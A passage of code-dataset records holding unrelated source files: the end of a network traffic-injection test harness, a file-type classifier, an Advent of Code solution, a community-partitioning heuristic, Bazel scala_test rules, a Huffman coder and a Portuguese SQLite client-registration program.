retval == NSInjector.RETURN_CODE_VALUES[\"READY\"]:\n self.logger.debug(\"NSInjector module already started. Doing nothing.\")\n return\n\n retval, _, _ = self.run_injection_command(\\\n NSInjector._LOAD_INJECTOR % (self.process_name,))\n assert retval == NSInjector.RETURN_CODE_VALUES[\"SUCCESS\"] or \\\n retval == NSInjector.RETURN_CODE_VALUES[\"ALREADY_EXISTS\"]\n\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n assert retval == NSInjector.RETURN_CODE_VALUES[\"READY\"]\n\n def _stop_injector_module(self):\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n if retval == NSInjector.RETURN_CODE_VALUES['NOT_LOADED']:\n self.logger.debug(\"NSInjector module already stopped. Doing nothing.\")\n return \n\n retval, _, _ = self.run_injection_command(NSInjector._UNLOAD_INJECTOR)\n assert retval == NSInjector.RETURN_CODE_VALUES['SUCCESS']\n\n retval, _, _ = self.run_injection_command(NSInjector._QUERY_LOADED)\n assert retval == NSInjector.RETURN_CODE_VALUES['NOT_LOADED']\n\n def _restart_injector_module(self):\n self._stop_injector_module()\n self._start_injector_module()\n\n def _inject_traffic(self):\n actions = [\"ns config injector delete pool all;\",\n \"ns config injector set pool %s;\" % (self.cell_ip,),\n OAMCommands().retrieve_set_anon_session()+\";\",\n \"ns config scm plugin canalyzer set pkt-mark enable off;\",\n \"ns config scm plugin canalyzer set pkt-mark enable on;\",\n \"ns config scm plugin canalyzer delete rule-matches;\",\n \"ns config injector start /tmp/.injector\"]\n\n files = sorted(os.listdir(self.capture_file))\n assert files\n\n files = [os.path.join(self.capture_file, aux) \\\n for aux in files if not aux.endswith('.xml')]\n\n with open(\"/tmp/.injector\", \"w\") as f:\n f.write(files[0])\n\n with open(\"/tmp/traces_list\", \"w\") as f:\n f.write('\\n'.join(files))\n\n for act in actions:\n retval, stdout, _ = self.run_injection_command(act)\n assert retval == 0, \"Command: '%s' exited with code: %d - %s\" % \\\n (act, retval, stdout)\n \n def _wait_until_injection_finished(self):\n \"\"\"\n Wait until the injection has finished, polling every 1 second\n to its status\n \"\"\"\n retval, stdout, _ = None, None, None\n for _ in range(NSInjector._N_TRIES):\n retval, stdout, _ = self.run_injection_command(\\\n NSInjector._QUERY_STATUS)\n if retval == 0:\n if 'Not running.' in stdout:\n break\n time.sleep(NSInjector._SLEEPING_TIME)\n\n if retval == 1:\n self.logger.warning(\"Command: '%s' returned: %s (%d).\" %\n (NSInjector._QUERY_STATUS, stdout, retval))\n self.logger.warning(\"Restarting NSInjector...\")\n self._restart_injector_module()\n\n assert retval == 0 and 'Not running.' 
in stdout\n\n def _free_resources(self):\n if os.path.isfile( \"/tmp/traces_list\" ):\n os.remove( \"/tmp/traces_list\" )\n if os.path.isfile( \"/tmp/.injector\" ):\n os.remove( \"/tmp/.injector\" )\n\n def run_injection_command(self, command_str, partition=None):\n part = self.partition if partition is None else partition\n cmd = 'ns partition set %d; %s' % (part, command_str)\n\n return super(NSInjector, self).run_injection_command(cmd)\n\n def run(self):\n \"\"\"\n It injects the traffic given the attributes of this class, and stores\n the statistics as an L{InjectorStats} parameter\n\n @return: The return code of the injector, indicating success (zero) or \n failure (non-zero).\n @rtype: int\n \"\"\"\n try:\n self._setup_sasn_env()\n self._restart_injector_module()\n\n self._inject_traffic()\n\n self._wait_until_injection_finished()\n self.logger.debug(\"Traffic injection finished\")\n except:\n etype, value, traceb = sys.exc_info()\n error_exception_lines = traceback.format_exception(etype, value, traceb)\n logging.getLogger(\"NSTlogger\").exception(error_exception_lines)\n \n finally:\n self._free_resources()\n\n def get_protocol_marks(self):\n SHOW_DETECTION_IDS_CMD = 'ns part set 1; ns config injector show detection-ids'\n\n ret_code, stdout, stderr = self.run_injection_command(SHOW_DETECTION_IDS_CMD)\n assert ret_code == 0 and stdout != 'no injector loaded', \\\n \"Command: '%s' returned (%d, %s, %s)\" % (SHOW_DETECTION_IDS_CMD,\n ret_code, stdout, stderr)\n \n detection_ids = {}\n for l in stdout:\n try:\n mark, proto_label = l.split(':')\n detection_ids[mark] = proto_label\n except ValueError:\n break\n\n return detection_ids\n","sub_path":"sds/back_test/ref/nsInjector.py","file_name":"nsInjector.py","file_ext":"py","file_size_in_byte":7807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"561716043","text":"import sys\nfrom collections import Counter\ndef is_sql(line):\n key = \" \".join(line.split()[:2])\n if key in [\"INSERT INTO\", \"CREATE TABLE\"]:\n return True\n return False\n\ndef csv_potential(line, char):\n # number of fields this delimiter would produce for the line\n return len(line.split(char))\n\n\ndef move_to_folder(file):\n #return types:\n #0 - sql\n #1 - csv/tsv\n #2 - hash\n #3 - space delimited/ambiguous\n #4 - unstructured/dox\n f0 = open(file, \"r\")\n n_lines = 0\n delim = [\",\", \":\", \"\\t\", \" \"]\n d_csv = {}\n for d in delim:\n d_csv[d] = []\n try:\n for line in f0:\n if is_sql(line):\n return 0 #0 type = sql\n for d in delim:\n d_csv[d].append(csv_potential(line, d))\n n_lines += 1\n if n_lines == 150:\n break\n\n\n for k, v in d_csv.items():\n # modal field count for this delimiter (replaces a broken consecutive groupby/max)\n m_v, m_count = Counter(v).most_common(1)[0]\n if m_count / len(v) > .8:\n if k == \",\" or k == \"\\t\":\n return 1\n elif k == \":\" and m_v == 2:\n return 2\n elif k == \":\":\n return 1\n elif k == \" \":\n return 3\n\n return 4\n except:\n print(\"File:\", file)\n print(\"Unexpected error:\", sys.exc_info()[0])\n print(\"Line:\", line)\n return -1","sub_path":"file_type_assign.py","file_name":"file_type_assign.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"649705193","text":"#! 
/usr/bin/env python3\n\nfrom pathlib import Path\nfrom itertools import takewhile\nfrom collections import Counter\n\ndef parse(coord_list):\n coordinates = [[int(coord) for coord in coord_pair.split(', ')]\n for coord_pair in coord_list]\n return coordinates\n\ndef coord_bounds(coordinates):\n x_coords, y_coords = zip(*coordinates)\n\n xmin = min(x_coords)\n xmax = max(x_coords)\n ymin = min(y_coords)\n ymax = max(y_coords)\n\n return xmin, xmax, ymin, ymax\n\ndef L1_dist(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return abs(x1-x2) + abs(y1-y2)\n\ndef part1(coordinates):\n\n xmin, xmax, ymin, ymax = coord_bounds(coordinates)\n atlas = {}\n\n for x in range(xmin, xmax+1):\n for y in range(ymin, ymax+1):\n # sort and iterate only over as many as share the minimum distance\n npoint_dists = sorted(((n, L1_dist((x,y), coord))\n for (n, coord) in enumerate(coordinates)),\n key=lambda x: x[1])\n closest = [*takewhile(lambda x: x[1] == npoint_dists[0][1], npoint_dists)]\n if len(closest) > 1:\n continue\n atlas[x, y] = closest[0][0]\n\n edges = {n for ((x, y), n) in atlas.items()\n if x in {xmin, xmax} or y in {ymin, ymax}}\n areas = Counter(n for n in atlas.values() if n not in edges)\n return areas.most_common(1)[0][1]\n\ndef part2(coordinates, max_tot_dist):\n\n xmin, xmax, ymin, ymax = coord_bounds(coordinates)\n atlas = {}\n\n for x in range(xmin, xmax+1):\n for y in range(ymin, ymax+1):\n dist = sum((L1_dist((x,y), coord)\n for coord in coordinates))\n if dist >= max_tot_dist:\n continue\n atlas[x, y] = 1\n return sum(atlas.values())\n\nif __name__ == '__main__':\n\n with open(str(Path('../data/06.dat')), 'r') as f:\n coordinates = parse(f)\n\n print(part1(coordinates))\n\n print(part2(coordinates, max_tot_dist=10000))\n","sub_path":"src/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"245231499","text":"# encoding: utf-8\n\nimport LoadData as ld\nimport random as rd\nimport Send_QQ_Msg as sq\nimport time\nimport profile\n\n\nclass MulstReloc:\n def __init__(self, path, t_limit=0, scale=0):\n \"\"\"\n t_limit: time limit or iteration-count limit\n path: path to the dataset\n scale: number of communities\n solution: current solution to the problem in vector form\n best_solution: best solution found so far\n \"\"\"\n self.t_limit = t_limit\n self.dataset = ld.load_data(path)\n self.scale = scale\n self.solution = [0] * (self.dataset.vnum + 1)\n self.best_solution = [0] * (self.dataset.vnum + 1)\n self.best_pt = []\n\n # Generate the initial solution\n def init_solution(self):\n # t_i1 = time.time()\n k_max = self.dataset.vnum\n vertex_set = list(range(1, k_max + 1))\n core = []\n i = 0\n # Initially pick K distinct nodes\n while True:\n t = rd.randint(1, k_max)\n if t not in core:\n core.append(t)\n self.solution[t] = i\n vertex_set.remove(t)\n i += 1\n if len(core) == self.scale:\n break\n # Handle the remaining n-K nodes\n for v in vertex_set:\n score = []\n for c in core:\n c_score = self.neighborhood_similarity_v2(v, c)\n score.append(c_score)\n max_score = max(score)\n max_score_list = []\n for i in range(self.scale):\n if score[i] == max_score:\n max_score_list.append(i)\n # On ties in neighborhood similarity, assign to a random candidate\n res = max_score_list[rd.randint(0, len(max_score_list) - 1)]\n self.solution[v] = res\n # t_i2 = time.time()\n # print('Time to generate the initial solution:', t_i2 - t_i1)\n print('Initial solution generated')\n\n # Neighborhood similarity\n def neighborhood_similarity_v2(self, x, y):\n neighbor_x = self.get_neighbor(x)\n neighbor_y = self.get_neighbor(y)\n return len(neighbor_x & neighbor_y)\n\n # Find all neighbor nodes of node x\n def get_neighbor(self, x):\n neighbor = set()\n idx = self.dataset.st_index\n idy = 
self.dataset.ed_index\n if idx[x] != -1:\n for xn in self.dataset.data[idx[x]:]:\n if xn[0] != x:\n break\n if xn[2] == 1:\n neighbor.add(xn[1])\n elif xn[2] == -1:\n neighbor.add(xn[1] * (-1))\n if idy[x] != -1:\n for yn in self.dataset.data_rev[idy[x]:]:\n if yn[1] != x:\n break\n # print(yn)\n if yn[2] == 1:\n neighbor.add(yn[0])\n elif yn[2] == -1:\n neighbor.add(yn[0] * (-1))\n return neighbor\n\n def z_function(self, array_solution):\n # negative edges inside a community + positive edges across communities\n z = 0\n pt = array_solution\n for each in self.dataset.data:\n # both endpoints of the edge belong to the same community\n if pt[each[0]] == pt[each[1]] and each[2] == -1:\n # and the edge is negative\n z += 1\n elif pt[each[0]] != pt[each[1]] and each[2] == 1:\n z += 1\n return z\n\n def delta_z(self, i, c):\n # For the current solution, move only node i to community c and compute the change in the objective\n sl = self.solution\n h = sl[i]\n div = 0\n # get its set of neighbors\n ns = self.get_neighbor(i)\n for each in ns:\n # the two nodes are joined by a negative edge; only same-community negative edges add to z_function\n if each < 0:\n # not in the same community before the move but together after it: the objective decreases\n if sl[-each] != h and sl[-each] == c:\n div -= 1\n elif sl[-each] == h and sl[-each] != c:\n div += 1\n # the two nodes are joined by a positive edge\n else:\n if sl[each] != h and sl[each] == c:\n div += 1\n elif sl[each] == h and sl[each] != c:\n div -= 1\n return -div\n\n # Convert the vector-form solution into community sets\n def solu2pt(self):\n pt = []\n for i in range(self.scale):\n pt.append([])\n sl = self.solution\n for i in range(1, self.dataset.vnum+1):\n pt[sl[i]].append(i)\n return pt\n\n # Main algorithm loop\n def run(self):\n # produce the initial partition\n self.init_solution()\n vnum = self.dataset.vnum\n scale = self.scale\n sl = self.solution\n improv = 0\n ct = 0\n while improv == 0:\n improv = 1\n ct += 1\n for i in range(vnum):\n # print('Processing node', i)\n # label all communities; used to track candidate moves for the node\n communities = list(range(scale))\n # find the community of the current node; its label is h\n h = sl[i]\n # print('Its community is', h)\n communities.remove(h)\n if sl.count(h) > 1:\n # try moving it to every other community\n for each in communities:\n # print('Candidate target community:', each)\n # remove node i from its current community\n # add node i to one of the other communities\n # evaluate the effect of the move with delta\n delta = self.delta_z(i, each)\n # if the move improves the objective, update the solution and stop trying other communities for this node\n if delta < 0:\n # print('==================== solution updated!!! ==========================')\n sl[i] = each\n improv = 0\n break\n # otherwise do nothing\n # print('Inner loop retried', ct, 'times')\n # print('Partition after this iteration:')\n # print('Corresponding objective value:', self.z_function(self.solution))\n # print('Loops needed to reach a local optimum: %d' % ct)\n\n def iter_run(self):\n i = 0\n while i < self.t_limit:\n self.run()\n if i == 0:\n self.best_solution = self.solution.copy()\n if self.z_function(self.solution) < self.z_function(self.best_solution):\n self.best_solution = self.solution.copy()\n i += 1\n print('Current best value:', self.z_function(self.best_solution))\n self.best_pt = self.solu2pt()\n # print(self.best_pt)\n\n\nif __name__ == '__main__':\n file_path = r'D:\\python_files\\src\\Instances\\Social Media\\slashdot-undirected\\part0'\n file_name = r'slashdot-undirected-size2000-part0.g'\n data_path = file_path + r'\\\\' + file_name\n time_st = time.time()\n mr = MulstReloc(data_path, 1000, scale=3)\n # profile.run('mr.iter_run()')\n mr.iter_run()\n time_ed = time.time()\n total_time = time_ed - time_st\n print('total time:', total_time)\n msg = 'Your program has finished, elapsed time: ' + str(total_time)\n sq.send_msg(msg)\n # a0 = mr.init_solution()\n # print(a0)\n","sub_path":"algorithm/Multistart_Relocation.py","file_name":"Multistart_Relocation.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"366094852","text":"\"\"\"Rules for writing tests with ScalaTest\"\"\"\n\nload(\n \"@io_bazel_rules_scala//scala/private:common_attributes.bzl\",\n 
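# Shared attribute dicts and helper symbols; they are merged into _scala_test_attrs by the update() calls near the bottom of this file.\n 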
\"common_attrs\",\n \"implicit_deps\",\n \"launcher_template\",\n)\nload(\"@io_bazel_rules_scala//scala/private:common.bzl\", \"sanitize_string_for_usage\")\nload(\"@io_bazel_rules_scala//scala/private:common_outputs.bzl\", \"common_outputs\")\nload(\n \"@io_bazel_rules_scala//scala/private:coverage_replacements_provider.bzl\",\n _coverage_replacements_provider = \"coverage_replacements_provider\",\n)\nload(\n \"@io_bazel_rules_scala//scala/private:rule_impls.bzl\",\n \"collect_jars_from_common_ctx\",\n \"declare_executable\",\n \"expand_location\",\n \"first_non_empty\",\n \"get_scalac_provider\",\n \"get_unused_dependency_checker_mode\",\n \"scala_binary_common\",\n \"write_executable\",\n \"write_java_wrapper\",\n)\n\ndef _scala_test_flags(ctx):\n # output report test duration\n flags = \"-oD\"\n if ctx.attr.full_stacktraces:\n flags += \"F\"\n else:\n flags += \"S\"\n if not ctx.attr.colors:\n flags += \"W\"\n return flags\n\ndef _scala_test_impl(ctx):\n scalac_provider = get_scalac_provider(ctx)\n\n unused_dependency_checker_mode = get_unused_dependency_checker_mode(ctx)\n unused_dependency_checker_ignored_targets = [\n target.label\n for target in scalac_provider.default_classpath +\n ctx.attr.unused_dependency_checker_ignored_targets\n ]\n unused_dependency_checker_is_off = unused_dependency_checker_mode == \"off\"\n\n scalatest_base_classpath = scalac_provider.default_classpath + [ctx.attr._scalatest]\n jars = collect_jars_from_common_ctx(\n ctx,\n scalatest_base_classpath,\n extra_runtime_deps = [\n ctx.attr._scalatest_reporter,\n ctx.attr._scalatest_runner,\n ],\n unused_dependency_checker_is_off = unused_dependency_checker_is_off,\n )\n (\n cjars,\n transitive_rjars,\n transitive_compile_jars,\n jars_to_labels,\n ) = (\n jars.compile_jars,\n jars.transitive_runtime_jars,\n jars.transitive_compile_jars,\n jars.jars2labels,\n )\n\n args = \"\\n\".join([\n \"-R\",\n ctx.outputs.jar.short_path,\n _scala_test_flags(ctx),\n \"-C\",\n \"io.bazel.rules.scala.JUnitXmlReporter\",\n ])\n\n argsFile = ctx.actions.declare_file(\"%s.args\" % ctx.label.name)\n ctx.actions.write(argsFile, args)\n\n executable = declare_executable(ctx)\n\n wrapper = write_java_wrapper(ctx, \"\", \"\")\n out = scala_binary_common(\n ctx,\n executable,\n cjars,\n transitive_rjars,\n transitive_compile_jars,\n jars_to_labels,\n wrapper,\n unused_dependency_checker_ignored_targets =\n unused_dependency_checker_ignored_targets,\n unused_dependency_checker_mode = unused_dependency_checker_mode,\n runfiles_ext = [argsFile],\n deps_providers = jars.deps_providers,\n )\n\n rjars = out.transitive_rjars\n\n coverage_runfiles = []\n if ctx.configuration.coverage_enabled and _coverage_replacements_provider.is_enabled(ctx):\n coverage_replacements = _coverage_replacements_provider.from_ctx(\n ctx,\n base = out.coverage.replacements,\n ).replacements\n\n rjars = depset([\n coverage_replacements[jar] if jar in coverage_replacements else jar\n for jar in rjars.to_list()\n ])\n coverage_runfiles = ctx.files._jacocorunner + ctx.files._lcov_merger + coverage_replacements.values()\n\n # jvm_flags passed in on the target override scala_test_jvm_flags passed in on the\n # toolchain\n final_jvm_flags = first_non_empty(\n ctx.attr.jvm_flags,\n ctx.toolchains[\"@io_bazel_rules_scala//scala:toolchain_type\"].scala_test_jvm_flags,\n )\n\n coverage_runfiles.extend(write_executable(\n ctx = ctx,\n executable = executable,\n jvm_flags = [\n \"-DRULES_SCALA_MAIN_WS_NAME=%s\" % ctx.workspace_name,\n \"-DRULES_SCALA_ARGS_FILE=%s\" % 
argsFile.short_path,\n ] + expand_location(ctx, final_jvm_flags),\n main_class = ctx.attr.main_class,\n rjars = rjars,\n use_jacoco = ctx.configuration.coverage_enabled,\n wrapper = wrapper,\n ))\n\n return struct(\n executable = executable,\n files = out.files,\n instrumented_files = out.instrumented_files,\n providers = out.providers,\n runfiles = ctx.runfiles(coverage_runfiles, transitive_files = out.runfiles.files),\n scala = out.scala,\n )\n\n_scala_test_attrs = {\n \"main_class\": attr.string(\n default = \"io.bazel.rulesscala.scala_test.Runner\",\n ),\n \"colors\": attr.bool(default = True),\n \"full_stacktraces\": attr.bool(default = True),\n \"jvm_flags\": attr.string_list(),\n \"_scalatest\": attr.label(\n default = Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ),\n \"_scalatest_runner\": attr.label(\n cfg = \"host\",\n default = Label(\"//src/java/io/bazel/rulesscala/scala_test:runner\"),\n ),\n \"_scalatest_reporter\": attr.label(\n default = Label(\"//scala/support:test_reporter\"),\n ),\n \"_jacocorunner\": attr.label(\n default = Label(\"@bazel_tools//tools/jdk:JacocoCoverage\"),\n ),\n \"_lcov_merger\": attr.label(\n default = Label(\"@bazel_tools//tools/test/CoverageOutputGenerator/java/com/google/devtools/coverageoutputgenerator:Main\"),\n ),\n}\n\n_test_resolve_deps = {\n \"_scala_toolchain\": attr.label_list(\n default = [\n Label(\n \"//external:io_bazel_rules_scala/dependency/scala/scala_library\",\n ),\n Label(\n \"//external:io_bazel_rules_scala/dependency/scalatest/scalatest\",\n ),\n ],\n allow_files = False,\n ),\n}\n\n_scala_test_attrs.update(launcher_template)\n\n_scala_test_attrs.update(implicit_deps)\n\n_scala_test_attrs.update(common_attrs)\n\n_scala_test_attrs.update(_test_resolve_deps)\n\nscala_test = rule(\n attrs = _scala_test_attrs,\n executable = True,\n fragments = [\"java\"],\n outputs = common_outputs,\n test = True,\n toolchains = [\"@io_bazel_rules_scala//scala:toolchain_type\"],\n implementation = _scala_test_impl,\n)\n\n# This auto-generates a test suite based on the passed set of targets\n# we will add a root test_suite with the name of the passed name\ndef scala_test_suite(\n name,\n srcs = [],\n visibility = None,\n use_short_names = False,\n **kwargs):\n ts = []\n i = 0\n for test_file in srcs:\n i = i + 1\n n = (\"%s_%s\" % (name, i)) if use_short_names else (\"%s_test_suite_%s\" % (name, sanitize_string_for_usage(test_file)))\n scala_test(\n name = n,\n srcs = [test_file],\n visibility = visibility,\n unused_dependency_checker_mode = \"off\",\n **kwargs\n )\n ts.append(n)\n native.test_suite(name = name, tests = ts, visibility = visibility)\n","sub_path":"scala/private/rules/scala_test.bzl","file_name":"scala_test.bzl","file_ext":"bzl","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1427233","text":"from priorityqueue import *\nfrom stack import *\n'''\nJust the steps interpreted from the code doc\n1. Huffman takes a string called X with length N and D distinct characters\n2. Compute the frequency for each character C in X\n3. Make a priority Queue, Q\n4.for each character c, make a single node binary tree storing c with\ndetail about its frequency\n\n5. Use the Queue to dequeue and start left and right subtree, then insert new tree into Q with combined frequency\n6. Finally, dequeue the last item (which should be the entire huffman encoded tree)\n7. 
Return Tree\n'''\nclass Node:\n def __init__(self,freq,char,left,right):\n self.freq = freq\n self.char = char\n self.left = left\n self.right = right\n def __repr__(self):\n return str((self.char, self.freq))\n def __iter__(self):\n if self.left != None:\n for elem in self.left:\n yield elem \n yield self.char\n if self.right != None:\n for elem in self.right:\n yield elem \n def isLeaf(self):\n if self.left == None and self.right == None:\n return True\n return False\n def twochildren(self):\n if self.left and self.right:\n return True\n return False\n def leftonly(self):\n if self.left and not self.right:\n return True\n return False\n def rightonly(self):\n if self.right and not self.left:\n return True\n return False\n#this will take a string X of length n with d distinct characters\n#and will return the huffman coding tree for X\n'''=== Higher frequency characters have lower priority==='''\ndef huffman(X):\n \n Q = PriorityQueue()\n \n f = freq(X) #This is a dictionary\n c_sorted = sorted(f.items(), key=lambda x:ord(x[0]),reverse = True)\n \n for c in c_sorted:\n T = Node(c[1],c[0],None,None)\n Q.enqueue(T, 100-c[1])\n \n \n while len(Q) > 1:\n \n T1 = Q.dequeue()\n \n T2 = Q.dequeue()\n \n T = Node(T1.freq + T2.freq, str(T1.freq + T2.freq), T1, T2)\n pri = T1.freq + T2.freq\n \n Q.enqueue(T, 100-(pri))\n T = Q.dequeue()\n \n return T\ndef freq(c):\n dict = {}\n for n in c:\n keys = dict.keys()\n if n in keys:\n dict[n] +=1\n else:\n dict[n] = 1\n return dict\n\n''' If you traverse left, \"0\", if you traverse right\n\"1\" get the code when you reach the character and return that code number (or probably the\nthe code numbers in a list\n'''\n\n\ndef preorder(tree):\n root = tree\n b = []\n c = []\n a = []\n if not root:\n return\n if root.isLeaf():\n a = [root.char]\n if root.left:\n b = preorder(root.left)\n if root.right:\n c = preorder(root.right)\n return a + b + c\ndef findChar(ch,root):\n nodeS = Stack()\n moves = Stack()\n visited = []\n code = []\n nodeS.push(root)\n current_node = nodeS.top()\n while nodeS:\n if current_node.left and current_node.left not in visited:\n nodeS.push(current_node.left)\n visited.append(current_node.left)\n moves.push('L')\n current_node = nodeS.top()\n else:\n if current_node.right and current_node.right not in visited:\n nodeS.push(current_node.right)\n visited.append(current_node.right)\n moves.push('R')\n current_node = nodeS.top()\n if current_node.right in visited:\n moves.pop()\n nodeS.pop()\n current_node = nodeS.top()\n if current_node.isLeaf() and current_node.char != ch:\n moves.pop()\n nodeS.pop()\n current_node = nodeS.top()\n if current_node.isLeaf() and current_node.char == ch:\n while not moves.isEmpty():\n code.append(moves.pop())\n break\n \n return code[::-1]\ndef code_helper(code):\n cd = ''\n for i in code:\n if i == 'L':\n cd = cd + '0'\n else:\n cd = cd + '1'\n return cd\n \ndef get_huffman_code(ch,root):\n b = findChar(ch,root)\n return code_helper(b)\n\n\n#Helper function for Huffman that will count the frequency of characters \n#i.e apple, p shows up twice, break ties for characters that have the same frequency by checking ASCII codes\n\n \n \n\ndef main():\n pass\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"224906358","text":"#!/usr/bin/python3\n#-*-coding:utf8;-*-\n\n'''\n| CADASTRO DE CLIENTES |\n\n[Github] 
https://github.com/MartinsMessias\n'''\n\n# Required modules\nfrom cores import Azul, CorNull, INBlue, INRed, URed, FAIWhite\nimport sqlite3\nfrom os import system\nfrom time import sleep\n\n# Shorter aliases for the color names\n\nAz = Azul # blue\nRe = URed # underlined red\nCN = CorNull # reset color\nINB = INBlue # bold intense blue\nINR = INRed # bold intense red\nFDb = FAIWhite # white background\n\n# Connecting to the database...\nconn = sqlite3.connect(':memory:') # Use 'clientes.db' if you want persistent data\n\n# Creating the cursor...\ncursor = conn.cursor()\n\n# Create the table if it does not exist yet\ncursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS clientes (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n nome VARCHAR NOT NULL,\n cpf VARCHAR(14) NOT NULL,\n telefone VARCHAR(20));\"\"\")\n\n\n# Program functions\ndef funcoesOp(opcao):\n if opcao == 1:\n nome = str(input('{}\\n[ NOME ]: {}'.format(INR, CN))).strip()\n cpf = str(input('{}\\n[ CPF ]: {}'.format(INR, CN))).strip()\n telefone = str(input('{}\\n[ TEL ]: {}'.format(INR, CN))).strip()\n\n # Insert the data into the table\n\n info = [(nome, cpf, telefone)]\n\n cursor.executemany(\"\"\"\n INSERT INTO clientes (nome, cpf, telefone)\n VALUES (?,?,?)\"\"\", info)\n conn.commit()\n\n print('\\n{}[ DADOS INSERIDOS COM SUCESSO ]{}'.format(INR, CN))\n\n retornaMenu()\n\n elif opcao == 2:\n if verificaDB() == True:\n alteraInfo()\n retornaMenu()\n\n elif opcao == 3:\n if verificaDB() == True:\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n retornaMenu()\n\n elif opcao == 4:\n if verificaDB() == True:\n cursor.execute(\"\"\"SELECT * FROM clientes;\"\"\")\n ordenaLista(cursor.fetchall())\n retornaMenu()\n\n elif opcao == 5:\n if verificaDB() == True:\n excluiCli()\n\n elif opcao == 0:\n print('\\n{}Saindo...{}'.format(INR, CN))\n\n # Close the database connection\n conn.close()\n exit()\n\n else:\n menuPrincipal()\n\n\ndef menuPrincipal():\n # Main menu\n\n system('clear')\n\n print(INB, 10 * '=', '|- : ', INR, 'MENU PRINCIPAL', CN, INB, ' : -|', 10 * '=', '\\n', CN, Az,\n '''\n\n [1] - Adicionar novo\n [2] - Alterar informações\n [3] - Consultar informações\n [4] - Consultar todos\n [5] - Excluir\n [0] - Sair\n \n''', INB, 44 * '=', CN, '\\n')\n\n opcao = int(input('{}[OPÇÃO]: {}'.format(INR, CN)))\n funcoesOp(opcao)\n\n\ndef retornaMenu():\n op = str(input('\\n\\t{2}[ OPÇÕES ]\\n\\n\\t'\n '{0}ALTERAR INFORMAÇÕES{1} {2}[1]\\n\\t'\n '{0}EXCLUIR CADASTRO{1} {2}[2]\\n\\n\\t'\n '{0}Para voltar ao menu pressione {2}[ENTER]\\n\\t--: {1}'.format(INB, CN, INR))).strip()\n system('clear')\n\n if op == '1': alteraInfo()\n if op == '2':\n excluiCli()\n else:\n menuPrincipal()\n\n\ndef ordenaLista(line):\n print('\\n' + INB + 3 * '=' + INR + '[ LISTA DE CADASTROS ]' + INB + 15 * '=' + CN + '\\n')\n\n for linha in line:\n sleep(0.3)\n id, nome, cpf, telefone = linha\n\n print(44 * '{}_{}'.format(Re, CN))\n print(INR, ' [ ID ]-', Az, '-[', id, ']')\n print(INR, ' [ NOME ]-', INB, '-[', nome)\n print(INR, ' [ CPF ]-', INB, '-[', cpf, )\n print(INR, ' [ TEL ]-', INB, '-[', telefone, CN)\n print(44 * '{}_{}'.format(Re, CN))\n\n\ndef consultaInfo(cpf):\n info = [(cpf)]\n\n # Read the data back from the database\n cursor.execute(\"\"\"\n SELECT * FROM clientes\n WHERE cpf = ?\"\"\", info)\n conn.commit()\n\n ordenaLista(cursor.fetchall())\n\n\ndef alteraInfo():\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n\n print(INR, '''\\n\n [Nome ][1]\n [CPF ][2]\n [Telefone][3]\n\n Escolha uma ou mais opções pelo número\n \\n''', CN)\n\n 
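# the reply may hold several digits at once (e.g. '13'), and list() splits it into one option per digit\n 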
info = str(input('{}[OPÇÃO]: {}'.format(INR, CN))).strip()\n info = list(info)\n\n if '1' in info:\n nome = str(input('\\n{}[Novo nome]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET nome = ? WHERE cpf = ?\"\"\", (nome, cpf))\n conn.commit()\n\n if '2' in info:\n cpfnovo = str(input('\\n{}[Novo CPF]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET cpf = ? WHERE cpf = ?\"\"\", (cpfnovo, cpf))\n conn.commit()\n cpf = cpfnovo\n\n if '3' in info:\n telefone = str(input('\\n{}[Novo telefone]:{} '.format(INB, CN))).strip()\n cursor.execute(\"\"\"UPDATE clientes SET telefone = ? WHERE cpf = ?\"\"\", (telefone, cpf))\n conn.commit()\n\n consultaInfo(cpf)\n print(INR, '\\n[ ATUALIZADO COM SUCESSO ]', CN)\n\n\ndef excluiCli():\n cpf = input('{}\\nDigite o CPF: {}'.format(INR, CN)).strip()\n consultaInfo(cpf)\n\n id = input('{}\\nDigite o ID do cliente a ser excluído: {}'.format(INR, CN)).strip()\n test = input('{}\\nTens certeza que deseja excluir? (S/n): {}'.format(INR, CN)).strip().lower()\n\n if test == 's':\n # delete the record from the table; the 1-tuple (id,) is required here, since a bare string is read as one binding per character\n cursor.execute(\"\"\"DELETE FROM clientes WHERE id = ?\"\"\", (id,))\n conn.commit()\n\n print('\\n{}[ REMOVIDO COM SUCESSO ]{}'.format(INR, CN))\n\n retornaMenu()\n\n\ndef verificaDB():\n cursor.execute(\"\"\"SELECT id FROM clientes;\"\"\")\n lista = cursor.fetchall()\n\n if len(lista) == 0:\n print('\\n{}[ BANCO DE DADOS VAZIO ]{}'.format(INR, CN))\n input('Para voltar ao menu pressione {0}[ENTER]{1}'.format(INB, CN))\n menuPrincipal()\n return True\n\n\ntry:\n menuPrincipal()\nexcept ValueError:\n print(INR, 'Deve digitar o nº correspondente a opção desejada e em seguida tecle [ENTER]!!!', CN)\n sleep(3)\n menuPrincipal()\n\n# Close the database connection\nconn.close()\n","sub_path":"Algoritmos 